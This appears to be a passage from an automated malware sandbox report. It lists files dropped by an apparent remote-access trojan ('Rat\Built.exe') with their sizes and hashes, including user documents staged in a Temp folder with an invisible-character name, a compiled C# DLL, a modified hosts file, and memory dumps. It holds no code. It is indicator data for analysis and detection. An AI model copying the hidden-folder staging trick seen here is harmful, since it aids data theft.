b367e00e1a8a3e7af42d997b59e180dfca7e31622558398c398f594d619b91cedc4879bfdda303d37f31dfcc3447faa88f65fd13bac109889cee8c1e3c1d62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42762\sqlite3.dll

Filesize
622KB

MD5
c78fab9114164ac981902c44d3cd9b37

SHA1
cb34dff3cf82160731c7da5527c9f3e7e7f113b7

SHA256
4569acfa25dda192becda0d79f4254ce548a718b566792d73c43931306cc5242

SHA512
bf82ccc02248be669fe4e28d8342b726cf52c4ec2bfe2ec1f71661528e2d8df03781ae5ccf005a6022d59a90e36cea7d3c7a495bd11bf149319c891c00ac669b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI42762\unicodedata.pyd

Filesize
295KB

MD5
af87b4aa3862a59d74ff91be300ee9e3

SHA1
e5bfd29f92c28afa79a02dc97a26ed47e4f199b4

SHA256
fac71c7622957fe0773214c7432364d7fc39c5e12250ff9eaaeea4d897564dc7

SHA512
1fb0b8100dffd18c433c4aa97a4f2da76ff6e62e2ef2139edc4f98603ba0bb1c27b310b187b5070cf4e892ffc2d09661a6914defa4509c99b60bcbb50f70f4a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgzuf2jj.bvm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\e3q4aoul\e3q4aoul.dll

Filesize
4KB

MD5
b71155c79bfeb502a9c1cc3a44e95ffe

SHA1
36daa3e095d0a45edeb67ecfdcf9f8cbe10f21d7

SHA256
4fa7d5c922efd338c890aa8ccf406c531084356a89b202e4dcf65c52141273b1

SHA512
7d1cca213bbc932961d85293896de7c65a8215783a269786ca289f42ba014f378a7acce4cf5ce9eef3edc24e797064054209373e0ca85f6734f69e19ede3f881

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Desktop\ApproveEdit.xlsx

Filesize
14KB

MD5
9a6d282a241231c47e270aa7a0f70d6c

SHA1
18aba2c87b83549e4c6c7eb9615e92350a927b9f

SHA256
478df1c36780e0ad995d13ed8cec3ba8560757a5c6db910f4c7c3ebacd4e7c95

SHA512
0eea4d1787db7260758fad65e0d153564dcaff1b80a66c3dec07d80f6dc27e263e1ed242e6a435133fd96387b941b088afd19b38a26799afc2d6895a3b803382

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Desktop\BackupEnable.3gp

Filesize
304KB

MD5
0d5c8592715d5e34ff20101f64c2993f

SHA1
5d9a73b02db103380ec32d6ffae885107d77a8e6

SHA256
f01f00a0322ba215b784663b1705544b390d74e5f8717315239d71735b86f8ce

SHA512
18744350891472433fdde131167a677094fbfa0d35ac24f551966d050bd1c8f499ee65782f7c445397b85f6d02fc5a280849c4cfc2f90b052132d3a47b6bebe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Desktop\CompareRepair.mp3

Filesize
358KB

MD5
6cda19f896ef72534106f63aa32dd9bb

SHA1
8c2abbbe6cf350bcb598ec2c34b482b0fa539dd1

SHA256
7707e64b5497eabfed5fd9fab8889d948077fdf8340d2bff1d8f4788de173a85

SHA512
58873389b1ba23c06d0060d6585d502429b8daac2666e1f1b46eaa0ba08d5f39a901f4cd81e71450365eb32fe50835a6cb55c73bf3c3d6d5b1ae4502ea6c03ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Desktop\DebugUnpublish.xlsx

Filesize
10KB

MD5
a20141c1f0be028b07db9047b55675b6

SHA1
59bbca9e87d8fdf1f8e566ffcf29d2403eaa96db

SHA256
c7b70b74e0572376fcee20fcf48ef23587a4c1542b7735cfe5c4ac2c2f1accf8

SHA512
02e9d52a236c19c19e4e42534df5f5058b0a38d9e3ed4b9fb691e38a5b9bfb4e6b2465ed7cac8526ea8232c6030bda6a7d45705fd25d7a66c13bd44a3a94e460

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Desktop\ShowCopy.docx

Filesize
15KB

MD5
2ee74563c0c91fc0007ed561e8a01caa

SHA1
e129b2e53e3b975ddf64969c736fb9d2de0acfef

SHA256
53f33230de6a6c85053e64b768f337f3021419830c2a1515112bbd7448c32029

SHA512
5a738ae5d6361835b36a52ee9b41cf1c5c8770af0fba593d209d9c788214891f100a592ae373a376d40b9953a954e747545f7d3264d7d4eedece7c537a462fea

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Desktop\ShowDeny.docx

Filesize
15KB

MD5
62d48ff248c45fe977dba594d39a98e8

SHA1
2af3773119eb7da65db3cad8ab440cf8273117a0

SHA256
8226af144b72d0a8648b8adfec63c400dc9262e0d5e4fae762cdfe7d9baa35a2

SHA512
ba9710d3e94d0021ca1f761aaad92f1e7618eb02bc3e4fd9bf97abe344caec6ac4b36923a9d29017d69e1076e7f2d5928259a83124cd27714ccf4009b8b938e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Documents\CompressConvert.xlsx

Filesize
9KB

MD5
f9db9618ca28b6bfc99e48c575fc1ad9

SHA1
34158a0fc520c333e858ff8b1911072a6b8b7cff

SHA256
9f9d1b06b7e0a9f9021c04ec191674a5d68e3a6974c617448b1d5cf4e03a1012

SHA512
d860ad0a541e9371cbac6682936b8f690945144e4b6c7828b7288e546cbf9a9258ec55b9a9b8ae0cf850ca401c374225a6c21ed3fbbeff6a04e8ad69642291cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Documents\DismountRegister.xlsx

Filesize
10KB

MD5
3911b7b89dd695998d023aacff02e2f9

SHA1
a3a7259f2da5d8900c7ebb6d37fa9df51a2df53c

SHA256
c52f5b74aab7bcf560ec125014ed99ebaea61165e367302e8f28b140915e78dd

SHA512
6e472b05798d224a4de60b5dc10fa69f1df6b1495f0db7f71987c11dccdd8b37fc09b2d0159adcd09e6b8ad76ecc31626878a9d3dc60793315d119217d387e12

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‌‌  \Common Files\Documents\GroupSwitch.xlsx

Filesize
13KB

MD5
22d3b2b3191acb0bab164b76ba38dae0

SHA1
7e78da847567ac8fcb061cf7cd6d423cfafb6c76

SHA256
f625b1cea1930c9c2bd0b14770db2b66ef5af96a89afd569671a31b7262b56c1

SHA512
c1b565b260da80f2890b95f69f3681de7274763f40e0d91197da854b76c8b08c7f0cefc7c3cf18ce9828086740c78f2d082d06f4f39c3b539d80faba856a6610

Download Submit
C:\Users\Admin\Desktop\Rat\Built.exe

Filesize
7.4MB

MD5
d982b1f36c0f48df1731a3009c354ff9

SHA1
7ff423fc3c5bb7de361f0eecc8eea381cbe6e1f9

SHA256
e24561aff8d8b1a2bed907b15568a74d631feec9a340c30e045705f0166304e0

SHA512
bc5df67ed6b680484e741be435c50c92895d1c0f94502d850abb5df6cd5cac5b869413e1a5c80c57b6953446965b265ce18d37c6810bec73df7b4aea86df6aba

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e3q4aoul\CSC11CFFD74D7064FB1A8E4D6933EA6B1A.TMP

Filesize
652B

MD5
3492eaf290bce50637968e5d17871c37

SHA1
da2c06893ed8eea3b08979ed1ea294e814ee18eb

SHA256
dda22d4c4702210d28f22213a1c93cd6499a675b65c4efd4ae5039faf2cea29d

SHA512
f986d08efd4a468de7dc4004f770533e4211359a47b56c319ce3514692a8da3e4190079dc1be7c167918b01266e54245ece0b642073477de881523be30938d6a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e3q4aoul\e3q4aoul.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e3q4aoul\e3q4aoul.cmdline

Filesize
607B

MD5
c1eed7e8e1d30f5e349bad83a166ba9b

SHA1
680ae5c925b07110f15d2ea66067b12a7f926e5d

SHA256
301b7d92655247a8eb21c2446bfb907e1e2f7ba260a7b94b2c775e3e1554e692

SHA512
5f9c073517d66aa0d808701bec47b289bdeff76dec08fe882dfaf962a6a71b191599ce3d8a8dbb4b2d550edf2f1877d6dc5e5b7343db89b3a66e5a2f75c80d28

Download Submit
memory/628-101-0x0000028EFF030000-0x0000028EFF052000-memory.dmp

Filesize
136KB

Download
memory/1308-206-0x00000243B8E20000-0x00000243B8E28000-memory.dmp

Filesize
32KB

Download
memory/4212-81-0x00007FFF207F0000-0x00007FFF20804000-memory.dmp

Filesize
80KB

Download
memory/4212-61-0x00007FFF23690000-0x00007FFF236A9000-memory.dmp

Filesize
100KB

Download
memory/4212-114-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp

Filesize
1.5MB

Download
memory/4212-190-0x00007FFF20BB0000-0x00007FFF20BC9000-memory.dmp

Filesize
100KB

Download
memory/4212-87-0x00007FFF1C100000-0x00007FFF1C21C000-memory.dmp

Filesize
1.1MB

Download
memory/4212-86-0x00007FFF23690000-0x00007FFF236A9000-memory.dmp

Filesize
100KB

Download
memory/4212-83-0x00007FFF20810000-0x00007FFF2083D000-memory.dmp

Filesize
180KB

Download
memory/4212-84-0x00007FFF23BE0000-0x00007FFF23BED000-memory.dmp

Filesize
52KB

Download
memory/4212-53-0x00007FFF29290000-0x00007FFF2929F000-memory.dmp

Filesize
60KB

Download
memory/4212-77-0x00007FFF0ECC0000-0x00007FFF0F1E2000-memory.dmp

Filesize
5.1MB

Download
memory/4212-78-0x000002C5533B0000-0x000002C5538D2000-memory.dmp

Filesize
5.1MB

Download
memory/4212-79-0x00007FFF24570000-0x00007FFF24593000-memory.dmp

Filesize
140KB

Download
memory/4212-30-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp

Filesize
5.9MB

Download
memory/4212-75-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp

Filesize
5.9MB

Download
memory/4212-273-0x00007FFF20540000-0x00007FFF20573000-memory.dmp

Filesize
204KB

Download
memory/4212-276-0x00007FFF1FA40000-0x00007FFF1FB0D000-memory.dmp

Filesize
820KB

Download
memory/4212-277-0x00007FFF0ECC0000-0x00007FFF0F1E2000-memory.dmp

Filesize
5.1MB

Download
memory/4212-76-0x00007FFF1FA40000-0x00007FFF1FB0D000-memory.dmp

Filesize
820KB

Download
memory/4212-71-0x00007FFF20540000-0x00007FFF20573000-memory.dmp

Filesize
204KB

Download
memory/4212-67-0x00007FFF20BB0000-0x00007FFF20BC9000-memory.dmp

Filesize
100KB

Download
memory/4212-69-0x00007FFF24760000-0x00007FFF2476D000-memory.dmp

Filesize
52KB

Download
memory/4212-65-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp

Filesize
1.5MB

Download
memory/4212-63-0x00007FFF20580000-0x00007FFF205A3000-memory.dmp

Filesize
140KB

Download
memory/4212-111-0x00007FFF20580000-0x00007FFF205A3000-memory.dmp

Filesize
140KB

Download
memory/4212-59-0x00007FFF20810000-0x00007FFF2083D000-memory.dmp

Filesize
180KB

Download
memory/4212-35-0x00007FFF24570000-0x00007FFF24593000-memory.dmp

Filesize
140KB

Download
memory/4212-289-0x000002C5533B0000-0x000002C5538D2000-memory.dmp

Filesize
5.1MB

Download
memory/4212-299-0x00007FFF207F0000-0x00007FFF20804000-memory.dmp

Filesize
80KB

Download
memory/4212-309-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp

Filesize
5.9MB

Download
memory/4212-315-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp

Filesize
1.5MB

Download
memory/4212-310-0x00007FFF24570000-0x00007FFF24593000-memory.dmp

Filesize
140KB

Download
memory/4212-340-0x00007FFF29290000-0x00007FFF2929F000-memory.dmp

Filesize
60KB

Download
memory/4212-348-0x00007FFF1FA40000-0x00007FFF1FB0D000-memory.dmp

Filesize
820KB

Download
memory/4212-352-0x00007FFF1C100000-0x00007FFF1C21C000-memory.dmp

Filesize
1.1MB

Download
memory/4212-351-0x00007FFF23BE0000-0x00007FFF23BED000-memory.dmp

Filesize
52KB

Download
memory/4212-350-0x00007FFF207F0000-0x00007FFF20804000-memory.dmp

Filesize
80KB

Download
memory/4212-349-0x00007FFF0ECC0000-0x00007FFF0F1E2000-memory.dmp

Filesize
5.1MB

Download
memory/4212-347-0x00007FFF20540000-0x00007FFF20573000-memory.dmp

Filesize
204KB

Download
memory/4212-346-0x00007FFF24760000-0x00007FFF2476D000-memory.dmp

Filesize
52KB

Download
memory/4212-345-0x00007FFF20BB0000-0x00007FFF20BC9000-memory.dmp

Filesize
100KB

Download
memory/4212-344-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp

Filesize
1.5MB

Download
memory/4212-343-0x00007FFF20580000-0x00007FFF205A3000-memory.dmp

Filesize
140KB

Download
memory/4212-342-0x00007FFF23690000-0x00007FFF236A9000-memory.dmp

Filesize
100KB

Download
memory/4212-341-0x00007FFF20810000-0x00007FFF2083D000-memory.dmp

Filesize
180KB

Download
memory/4212-339-0x00007FFF24570000-0x00007FFF24593000-memory.dmp

Filesize
140KB

Download
memory/4212-324-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp

Filesize
5.9MB

Download